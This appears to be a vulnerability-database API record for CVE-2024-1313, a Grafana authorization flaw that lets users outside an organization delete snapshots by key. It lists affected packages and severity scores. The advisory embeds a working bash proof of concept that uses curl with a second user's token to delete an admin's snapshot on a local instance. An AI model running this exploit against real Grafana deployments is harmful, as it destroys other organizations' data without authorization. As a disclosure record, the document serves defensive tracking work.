Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/12822?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/12822?format=api", "vulnerability_id": "VCID-271j-tym1-pkdr", "summary": "Grafana: Users outside an organization can delete a snapshot with its key\n### Summary\nThe ***DELETE /api/snapshots/{key}*** endpoint allows any Grafana user to delete snapshots if the user is NOT in the organization of the snapshot\n\n\n### Details\nAn attacker (a user without organization affiliation or with a \"no basic role\" in an organization other than the one where the dashboard exists), knowing the key or URL of a snapshot created by any user (including Grafana admins), can delete a snapshot (It is not feasible using UI), resulting in a BOLA vulnerability. \nIf an attacker is in the same organization of the dashboard snapshot, he can’t delete the snapshot. However, an attacker with low-privilege from a different organization would be able to delete it, resulting in the authorization flaw. \n\n\n\n### Precondition\nTo exploit this endpoint, an attacker must know the {key} of a snapshot. The attacker can potentially discover this key in various ways.\n\nWhen [creating a snapshot through the API](https://grafana.com/docs/grafana/latest/developers/http_api/snapshot/), users can manually specify a key without any complexity requirements. This lack of complexity makes this key susceptible to brute force attacks. For example, simplistic keys such as \"customer_key_123\" or \"admin_snap\" can be easily guessed. These predictable keys allow low-privileged attackers to perform brute-force attacks using common keywords, potentially leading to compromised data integrity.\n\nIn addition, this key is displayed in plain text in the URL of a snapshot. This means that if a user publicly displays a snapshot, viewers might note down the key. Furthermore, since the snapshot feature is often used for sharing, displaying, and backing up data, a low-privileged attacker could potentially find snapshot keys in places like the organization's content management system, messaging platform, or shared documents.\n\n### PoC\n```\n#!/bin/bash -x\n\n# /snapshots/{key}: {'delete': {'success_status_code': 200, 'exec_paths': ['post /snapshots']}}\n# 2d92c726-bf3c-4f20-b979-37bdf81d68c7\n\n# Authentication stage\n\n# User A - Grafana Admin\nuser_a_token=\"YWRtaW46YWRtaW4xMjM=\"\n\n# User B - User with no permissions , which is not part of any org\nuser_b_token=\"YmJiOmJiYmJiYmJiYg==\"\n\n# Create snapshot\ncurrent_date=$(date +%Y-%m-%d-%H-%M-%S)\nrandom_string=\"random-${current_date}\"\nsnapshot_data='{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"snapshotData\":[],\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"fiscalYearStartMonth\":0,\"graphTooltip\":0,\"id\":1517,\"links\":[],\"liveNow\":false,\"panels\":[{\"aliasColors\":{},\"bars\":false,\"dashLength\":10,\"dashes\":false,\"datasource\":null,\"fill\":1,\"fillGradient\":0,\"gridPos\":{\"h\":7,\"w\":24,\"x\":0,\"y\":0},\"hiddenSeries\":false,\"id\":4,\"legend\":{\"alignAsTable\":true,\"avg\":false,\"current\":true,\"max\":false,\"min\":false,\"rightSide\":true,\"show\":true,\"total\":false,\"values\":true},\"lines\":true,\"linewidth\":1,\"links\":[],\"nullPointMode\":\"null\",\"options\":{\"alertThreshold\":true},\"percentage\":false,\"pluginVersion\":\"10.2.3\",\"pointradius\":2,\"points\":false,\"renderer\":\"flot\",\"seriesOverrides\":[],\"snapshotData\":[{\"fields\":[{\"config\":{},\"name\":\"time\",\"type\":\"time\",\"values\":[1704380420234,1704380420334,1704380420434,1704380420534,1704380420634,1704380420734,1704380420834,1704380566535,1704380566635,1704380566735,1704380566835,1704380566935,1704380567035,1704380567135,1704380567235,1704380567335,1704380567435,1704380567535,1704380567635,1704380567735,1704380567835,1704380567935,1704380568035,1704380568135,1704380568235,1704380568335,1704380568435,1704380568535,1704380568635,1704380568735,1704380568835,1704380568935,1704380569035,1704380569135,1704380569235,1704380569335,1704380569435,1704380569535,1704380569635,1704380569735,1704380569835,1704380569935,1704380570035,1704380570135,1704380570235,1704380570335,1704380570435,1704380570535,1704380570635,1704380570735,1704380570835,1704380570935,1704380571035,1704380571135,1704380571235,1704380571335,1704380571435,1704380571535,1704380571635,1704380571735,1704380571835,1704380571935,1704380572035,1704380572135,1704380572235,1704380572335,1704380572435,1704380572535,1704380572635,1704380572735,1704380572835,1704380572935,1704380573035,1704380573135,1704380573235,1704380573335,1704380573435,1704380573535,1704380573635,1704380573735,1704380573835,1704380573935,1704380574035,1704380574135,1704380574235,1704380574335,1704380574435,1704380574535,1704380574635,1704380574735,1704380574835,1704380574935,1704380575035,1704380575135,1704380575235,1704380575335,1704380575435,1704380575535,1704380575635,1704380575735,1704380575835,1704380575935,1704380576035,1704380576135,1704380576235,1704380576335,1704380576435,1704380576535,1704380576635,1704380576735,1704380576835,1704380576935,1704380577035,1704380577135,1704380577235,1704380577335,1704380577435,1704380577535,1704380577635,1704380577735,1704380577835,1704380577935,1704380578035,1704380578135,1704380578235,1704380578335,1704380578435,1704380578535,98.36651881887735,90.90520552302428,100.73967111022498,109.89826524946163,102.00960918579666,106.33530882778683,106.52629457166695,109.56323497328492,116.87832749309237,115.14116509660076,115.70457190523986,118.1091621354617,113.9144753018141,117.58351263310455,117.38409043570634,126.94212224196508,134.50552909930198,127.97490160986311,123.5784401639683,125.31012734609902,118.56171579412602,122.71596068271737,116.11258334902308,118.07532920254557,113.5755959893507,117.02863610131872,122.42991477107806,124.68121765645371,121.45599945829102,120.93643213038477,118.75961398984585,118.70214867496358,116.1085878323934,109.08837112411643,111.90652582288098,109.69360084697551,113.57752983270163,121.0455900847171,116.98257636596624,118.33231004235124,128.19430473604484,119.7539320116394,120.39948913692677,117.05787774775756,109.29564979026497,119.08806090022262,111.20930907183256,104.99629052804383,96.05550719780628,87.99845374253385,83.19203585736912,83.13916797842998,-70.53615047052016,-73.3850420187272]}],\"meta\":{},\"refId\":\"A\"}],\"spaceLength\":10,\"stack\":false,\"steppedLine\":false,\"targets\":[],\"thresholds\":[],\"timeRegions\":[],\"title\":\"Simple dummy streaming example\",\"tooltip\":{\"shared\":true,\"sort\":0,\"value_type\":\"individual\"},\"type\":\"graph\",\"xaxis\":{\"mode\":\"time\",\"show\":true,\"values\":[]},\"yaxes\":[{\"format\":\"short\",\"logBase\":1,\"show\":true},{\"format\":\"short\",\"logBase\":1,\"show\":true}],\"yaxis\":{\"align\":false}}],\"refresh\":\"\",\"schemaVersion\":39,\"snapshot\":{\"timestamp\":\"2024-01-04T15:03:04.128Z\"},\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":\"2024-01-04T15:02:08.132Z\",\"to\":\"2024-01-04T15:03:08.132Z\",\"raw\":{\"from\":\"now-1m\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Simple Streaming Example Snapshot\",\"uid\":\"TXSTREZ\",\"version\":1,\"weekStart\":\"\"},\"name\":\"Simple Streaming Example Snapshot\", \"expires\":0, \"key\":\"admin_key\"}'\n\ncreate_snapshot_response=$(curl -s -X POST \"http://localhost:3000/api/snapshots\" -H \"Authorization: Basic ${user_a_token}\" -H \"Content-Type: application/json\" -d \"${snapshot_data}\")\n\n# Extract key from create snapshot response\nkey=$(echo \"$create_snapshot_response\" | jq -r '.key')\n\n# Delete snapshot\ndelete_snapshot_response=$(curl -s -X DELETE \"http://localhost:3000/api/snapshots/${key}\" -H \"Authorization: Basic ${user_b_token}\" -o /dev/null -w \"%{http_code}\")\n\n# Check if the test passed\nif [ \"$delete_snapshot_response\" -eq 200 ]; then\n echo -e \"\\033[32mTest was passed, BOLA\\033[0m\"\nfi\n\n```", "aliases": [ { "alias": "CVE-2024-1313" }, { "alias": "GHSA-67rv-qpw2-6qrr" } ], "fixed_packages": [], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93783?format=api", "purl": "pkg:rpm/redhat/grafana@9.2.10-16?arch=el9_4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-271j-tym1-pkdr" }, { "vulnerability": "VCID-6nrn-u58x-mben" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/grafana@9.2.10-16%3Farch=el9_4" }, { "url": "http://public2.vulnerablecode.io/api/packages/93782?format=api", "purl": "pkg:rpm/redhat/grafana@9.2.10-16?arch=el8_10", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-271j-tym1-pkdr" }, { "vulnerability": "VCID-6nrn-u58x-mben" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/grafana@9.2.10-16%3Farch=el8_10" } ], "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1313.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-1313.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-1313", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05687", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05753", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05758", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05765", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05789", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05763", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05724", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05728", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09006", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09207", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09163", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09151", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09026", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09122", "published_at": "2026-04-29T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-1313" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-67rv-qpw2-6qrr", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-67rv-qpw2-6qrr" }, { "reference_url": "https://github.com/grafana/grafana", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/grafana/grafana" }, { "reference_url": "https://grafana.com/security/security-advisories/cve-2024-1313", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://grafana.com/security/security-advisories/cve-2024-1313" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1313", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1313" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2271903", "reference_id": "2271903", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2271903" }, { "reference_url": "https://grafana.com/security/security-advisories/cve-2024-1313/", "reference_id": "cve-2024-1313", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-06-10T20:46:01Z/" } ], "url": "https://grafana.com/security/security-advisories/cve-2024-1313/" }, { "reference_url": "https://security.netapp.com/advisory/ntap-20240524-0008/", "reference_id": "ntap-20240524-0008", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-06-10T20:46:01Z/" } ], "url": "https://security.netapp.com/advisory/ntap-20240524-0008/" } ], "weaknesses": [ { "cwe_id": 639, "name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data." } ], "exploits": [], "severity_range_score": "6.5 - 8.9", "exploitability": "0.5", "weighted_severity": "8.0", "risk_score": 4.0, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-271j-tym1-pkdr" }
\n\n###](http://PM](https://user-images.githubusercontent.com/58054904/298194695-bea8ab57-8504-4f5d-9468-cef7acf8622b.png)%5Cn%5Cn###){kind=link}